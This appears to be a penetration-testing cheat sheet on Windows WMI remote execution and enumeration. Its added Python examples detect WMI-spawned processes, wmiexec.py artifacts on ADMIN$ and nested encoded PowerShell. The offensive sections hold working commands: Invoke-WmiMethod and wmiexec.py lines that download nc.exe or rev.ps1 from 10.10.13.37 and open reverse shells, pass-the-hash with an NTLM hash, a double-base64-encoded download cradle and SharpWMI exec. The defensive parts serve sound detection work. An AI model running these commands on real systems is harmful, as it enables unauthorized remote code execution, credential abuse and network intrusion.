# WMI

* <https://www.ethicalhacker.net/features/root/wmi-101-for-pentesters/>
* <https://hideandsec.sh/books/cheatsheets-82c/page/wmi>

Perform ICMP checks remotely using `Win32_PingStatus` and [wmiquery.py](https://github.com/fortra/impacket/blob/master/examples/wmiquery.py):

```
$ cat ping.wmi
SELECT StatusCode, ResponseTime FROM Win32_PingStatus WHERE Address='1.1'
$ wmiquery.py -k -no-pass SRV01.megacorp.local -file ping.wmi | grep '^ |' -A1
```

## PowerShell

Basic command to check if we have privileges to execute WMI:

```
PS > Get-WmiObject -Credential $cred -ComputerName PC01 -Namespace "root" -class "__Namespace" | Select Name
```

Execute commands:

```
PS > Invoke-WmiMethod -Credential $cred -ComputerName PC01 win32_process -Name Create -ArgumentList ("powershell (New-Object Net.WebClient).DownloadFile('http://10.10.13.37/nc.exe', 'C:\Users\bob\music\nc.exe')")
PS > Invoke-WmiMethod -Credential $cred -ComputerName PC01 win32_process -Name Create -ArgumentList ("C:\Users\bob\music\nc.exe 10.10.13.37 1337 -e powershell")
```
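From the defender's side, both `Invoke-WmiMethod ... Win32_Process -Name Create` calls above land on the target as children of the WMI provider host (`WmiPrvSE.exe`), which is the pivot most process-tree detections key on. The following is an added example, not code from the page: it runs a small rule set over constructed Sysmon Event ID 1 / Security 4688 style records (field names `Image`, `ParentImage`, `CommandLine`, `User`, `Computer` are assumed; the events are made up and the two hostile ones mirror the page's commands) and grades each WMI-spawned process by the indicators in its command line.

```python
"""Flag processes spawned through WMI (Win32_Process.Create) in process-creation telemetry.

Added example, not code from the original page. The events below are constructed
samples shaped like Sysmon Event ID 1 / Security 4688 fields (Image, ParentImage,
CommandLine, User, Computer); nothing here is captured from a real host.
"""
import re

# On the target, WMI-created processes are children of the WMI provider host.
WMI_HOST = re.compile(r"\\wbem\\wmiprvse\.exe$", re.IGNORECASE)
# Interpreters/LOLBins that are unusual children of WmiPrvSE.exe even without other indicators.
SHELLS = re.compile(r"\\(?:powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)\.exe$", re.IGNORECASE)

# Command-line indicators that raise severity when combined with a WMI parent.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression|\bcurl\b|\bwget\b", re.IGNORECASE),
    "encoded_command": re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE),
    "user_writable_path": re.compile(r"\\Users\\[^\\]+\\|\\ProgramData\\|\\Temp\\|\\AppData\\", re.IGNORECASE),
    "shell_redirect_flag": re.compile(r"\s-e\s+(?:cmd|powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE),
}

def classify(event):
    """Return a finding dict for a WMI-spawned process, or None for anything else."""
    if not WMI_HOST.search(event.get("ParentImage", "")):
        return None
    cmdline = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if hits:
        severity = "high"
    elif SHELLS.search(event.get("Image", "")):
        severity = "medium"  # interpreter under WmiPrvSE.exe but no payload indicator: admin scripts land here too
    else:
        severity = "low"
    return {
        "Computer": event.get("Computer"),
        "User": event.get("User"),
        "Image": event.get("Image"),
        "severity": severity,
        "indicators": hits,
    }

def detect(events):
    """Run classify() over a batch of process-creation events, keeping only WMI-spawned ones."""
    return [f for f in map(classify, events) if f is not None]

# Constructed sample events: the two Invoke-WmiMethod commands from the page as they
# would appear on PC01, one benign WMI-spawned admin script, and one ordinary
# service start that must be ignored.
SAMPLE_EVENTS = [
    {"Computer": "PC01", "User": r"MEGACORP\bob",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"powershell (New-Object Net.WebClient).DownloadFile('http://10.10.13.37/nc.exe', 'C:\Users\bob\music\nc.exe')"},
    {"Computer": "PC01", "User": r"MEGACORP\bob",
     "Image": r"C:\Users\bob\music\nc.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"C:\Users\bob\music\nc.exe 10.10.13.37 1337 -e powershell"},
    {"Computer": "PC01", "User": r"MEGACORP\svc_sccm",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /c gpupdate /force"},
    {"Computer": "PC01", "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding["severity"], finding["Computer"], finding["User"], finding["Image"], finding["indicators"])
```

The `medium` tier exists because SCCM, monitoring agents and admin scripts also create processes through WMI; the parent alone is a lead, and the command-line indicators are what turn it into an alert worth paging on.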

### WMI Enumeration

* <https://0xinfection.github.io/posts/wmi-basics-part-1/>
* <https://0xinfection.github.io/posts/wmi-classes-methods-part-2/>
* <https://0xinfection.github.io/posts/wmi-registry-part-3/>
* <https://0xinfection.github.io/posts/wmi-recon-enum/>

{% code title="Invoke-LocalWMIEnum.ps1" %}

```powershell
Get-WmiObject -Class Win32_ComputerSystem | select BootupState,UserName,TotalPhysicalMemory,SystemType,SystemFamily,Domain,DNSHostName,OEMStringArray | ft -AutoSize
Get-WmiObject -Class Win32_OperatingSystem | fl *
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | select PSComputerName,DisplayName,PathToSignedProductExe,PathToSignedReportingExe,ProductState,Timestamp | ft -AutoSize
Get-WmiObject Win32_Service | select Name,State,StartName,PathName | ? {$_.State -like "Running"} | findstr /vi "C:\Windows" | ft -AutoSize
Get-WmiObject -Class Win32_LoggedOnUser | select Antecedent,Dependent,PSComputerName | ft -AutoSize
Get-WmiObject -Class Win32_LogonSession | select AuthenticationPackage,LogonID,StartTime,Scope | ft -AutoSize
Get-WmiObject -Class Win32_QuickFixEngineering | select PSComputerName,Description,HotFixID,InstalledBy,InstalledOn | ft -AutoSize
Get-WmiObject -Class Win32_Share | select Type,Name,AllowMaximum,Description,Scope | ft -AutoSize
Get-WmiObject -Class Win32_IP4RouteTable | select PSComputerName,Caption,Mask,Metric1,Protocol | ft -AutoSize
Get-WmiObject -Class Win32_UserAccount | ft -AutoSize
Get-WmiObject -Class Win32_Group | ft -AutoSize
```

{% endcode %}

## MSFT\_MTProcess

* <https://specterops.io/blog/2025/09/18/more-fun-with-wmi/>
* <https://github.com/0xthirteen/WMI_Proc_Dump>
* <https://github.com/0xthirteen/mtprocess>

## Tools

### wmiexec.py

* <https://github.com/XiaoliChan/wmiexec-RegOut>
* <https://github.com/XiaoliChan/wmiexec-Pro>
* <https://github.com/WKL-Sec/WMIExec>

```
$ wmiexec.py -codec cp866 snovvcrash:'Passw0rd!'@192.168.1.11
$ wmiexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 snovvcrash@192.168.1.11
```

Get a PowerShell reverse-shell:

```
$ sudo python3 -m http.server 80
$ sudo rlwrap nc -lvnp 443
$ wmiexec.py -silentcommand -nooutput snovvcrash:'Passw0rd!'@192.168.1.11 'powershell iEx (iWr "http://10.10.13.37/rev.ps1")'
```
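In its default mode wmiexec.py wraps each command as `cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<unix_time> 2>&1`, reads the file back over SMB and deletes it; `-nooutput` drops the output file and `-silentcommand` drops the `cmd.exe` wrapper, which is why the reverse-shell one-liner above uses both. The short-lived `__<timestamp>` file on `ADMIN$` is a reliable artifact in share-access auditing. The following is an added example, not code from the page or from impacket: it groups constructed Security Event ID 5145 records (field names follow the real 5145 schema; the values, hosts and IPs are made up) into write/read/delete cycles on such files and recovers the operator-side clock embedded in the file name.

```python
"""Spot wmiexec.py's output file in SMB share-access auditing (Security Event ID 5145).

Added example, not code from the page or from impacket. By default wmiexec.py runs
`cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<unix_time> 2>&1`, then reads the file
back over SMB and deletes it. The 5145 records below are constructed samples; the
field names (ShareName, RelativeTargetName, AccessMask, IpAddress, SubjectUserName)
follow the Windows 5145 schema.
"""
import re
from collections import OrderedDict
from datetime import datetime, timezone

# wmiexec.py names the file "__" + str(time.time()) taken on the operator's host.
OUTPUT_FILE = re.compile(r"^__\d+(?:\.\d+)?$")

# Subset of the 5145 access-mask bits that the write/read/delete cycle touches.
ACCESS_BITS = ((0x2, "write"), (0x1, "read"), (0x10000, "delete"))

def access_ops(mask_hex):
    """Map a 5145 AccessMask such as '0x2' to the operations it requested."""
    mask = int(mask_hex, 16)
    return [name for bit, name in ACCESS_BITS if mask & bit]

def find_wmiexec_output_files(events):
    """Group 5145 events by target/source/user/file and report files shaped like wmiexec.py output."""
    sessions = OrderedDict()
    for ev in events:
        if ev.get("EventID") != 5145 or not ev["ShareName"].upper().endswith("ADMIN$"):
            continue
        name = ev["RelativeTargetName"]
        if not OUTPUT_FILE.match(name):
            continue
        key = (ev["Computer"], ev["IpAddress"], ev["SubjectUserName"], name)
        entry = sessions.setdefault(key, {
            "Computer": ev["Computer"], "source_ip": ev["IpAddress"],
            "user": ev["SubjectUserName"], "file": name, "ops": [],
            # The float in the file name is the operator's clock when the file was named:
            # useful for correlating their other activity, not a trustworthy target-side time.
            "tool_clock_utc": datetime.fromtimestamp(float(name[2:]), tz=timezone.utc).isoformat(),
        })
        for op in access_ops(ev["AccessMask"]):
            if op not in entry["ops"]:
                entry["ops"].append(op)
    return list(sessions.values())

# Constructed sample: one full wmiexec.py output cycle from 10.10.13.37, plus two
# ordinary share accesses that must not be reported.
SAMPLE_5145 = [
    {"EventID": 5145, "Computer": "PC01", "IpAddress": "10.10.13.37", "SubjectUserName": "snovvcrash",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "__1700000000.123456", "AccessMask": "0x2"},
    {"EventID": 5145, "Computer": "PC01", "IpAddress": "10.10.13.37", "SubjectUserName": "snovvcrash",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "__1700000000.123456", "AccessMask": "0x1"},
    {"EventID": 5145, "Computer": "PC01", "IpAddress": "10.10.13.37", "SubjectUserName": "snovvcrash",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "__1700000000.123456", "AccessMask": "0x10000"},
    {"EventID": 5145, "Computer": "PC01", "IpAddress": "10.0.0.5", "SubjectUserName": "bob",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"Users\bob\report.docx", "AccessMask": "0x1"},
    {"EventID": 5145, "Computer": "PC01", "IpAddress": "10.0.0.5", "SubjectUserName": "helpdesk",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": r"System32\drivers\etc\hosts", "AccessMask": "0x1"},
]

if __name__ == "__main__":
    for f in find_wmiexec_output_files(SAMPLE_5145):
        print(f["Computer"], f["user"], f["source_ip"], f["file"], f["ops"], f["tool_clock_utc"])
```

5145 is only emitted when "Audit Detailed File Share" is enabled, which is noisy on file servers but cheap on workstations and member servers, where any `ADMIN$` write from a non-management host already deserves a look. The `-silentcommand -nooutput` variant leaves no file at all, so pair this with process-creation monitoring rather than relying on it alone.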

When loading the cradle from a semi-interactive shell, you can combine it with `Invoke-WmiMethod` to spawn a new PowerShell process:

```bash
wmiexec.py -silentcommand -nooutput snovvcrash:'Passw0rd!'@192.168.1.11 "powershell -enc $(echo -n 'Invoke-WmiMethod Win32_Process -Name Create -ArgumentList ("powershell -enc '`echo -n 'IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/rev.ps1")' | iconv -t UTF-16LE | base64 -w0`'")' | iconv -t UTF-16LE | base64 -w0)"
```
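The nested one-liner above produces a command line whose real content is two `-enc` layers deep, so a triage script that only inspects the outer command sees base64. The following is an added example, not code from the page: it peels `powershell -enc` layers (base64 of UTF-16LE text) until no further encoded command is found and then lists the URLs seen at any depth. The sample command line is built here with the same three-layer structure as the page's one-liner (inner cradle, `Invoke-WmiMethod` wrapper, outer `powershell -enc`); the host and path come from the page and are not real infrastructure.

```python
"""Unwrap nested `powershell -enc` layers from a process command line.

Added example, not code from the page. It reverses the double-encoded
Invoke-WmiMethod cradle so an analyst can read the final script and the URLs
it reaches for. The sample command line is constructed below.
"""
import base64
import binascii
import re

# -e / -en / -enc / -EncodedCommand followed by a base64 blob of plausible length.
ENC_RX = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
URL_RX = re.compile(r"https?://[^\s\"'()<>]+", re.IGNORECASE)

def decode_layer(blob):
    """PowerShell -enc payloads are UTF-16LE text, base64-encoded."""
    return base64.b64decode(blob).decode("utf-16-le")

def unwrap(cmdline, max_depth=8):
    """Return [outer, ..., innermost] command lines, decoding each -enc layer found."""
    layers = [cmdline]
    for _ in range(max_depth):
        m = ENC_RX.search(layers[-1])
        if m is None:
            break
        try:
            layers.append(decode_layer(m.group(1)))
        except (binascii.Error, UnicodeDecodeError):
            break  # blob was not a real -enc payload (e.g. an unrelated "-e <word>" flag)
    return layers

def extract_urls(layers):
    """Collect every URL that appears at any decoding depth, in order of first sight."""
    urls = []
    for text in layers:
        for u in URL_RX.findall(text):
            if u not in urls:
                urls.append(u)
    return urls

def encode_layer(text):
    """Builder for the constructed sample only: the inverse of decode_layer."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

# Constructed sample with the page's three-layer structure.
INNER = 'IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/rev.ps1")'
MIDDLE = 'Invoke-WmiMethod Win32_Process -Name Create -ArgumentList ("powershell -enc %s")' % encode_layer(INNER)
SAMPLE_CMDLINE = "powershell -enc " + encode_layer(MIDDLE)

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap(SAMPLE_CMDLINE)):
        print("layer %d: %s" % (depth, layer[:100]))
    print("urls:", extract_urls(unwrap(SAMPLE_CMDLINE)))
```

The depth cap matters in practice: a decoder that loops on whatever `-e` it finds can be kept busy by junk, and the `binascii.Error` / `UnicodeDecodeError` branch is what makes command lines like `nc.exe ... -e powershell` pass through untouched instead of crashing the pipeline.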

### SharpWMI

* <https://github.com/GhostPack/SharpWMI>

```
PS > .\SharpWMI.exe action=exec [username=MEGACORP\snovvcrash] [password=Passw0rd!] computername=PC01 command="powershell -enc <BASE64_CMD>"
```

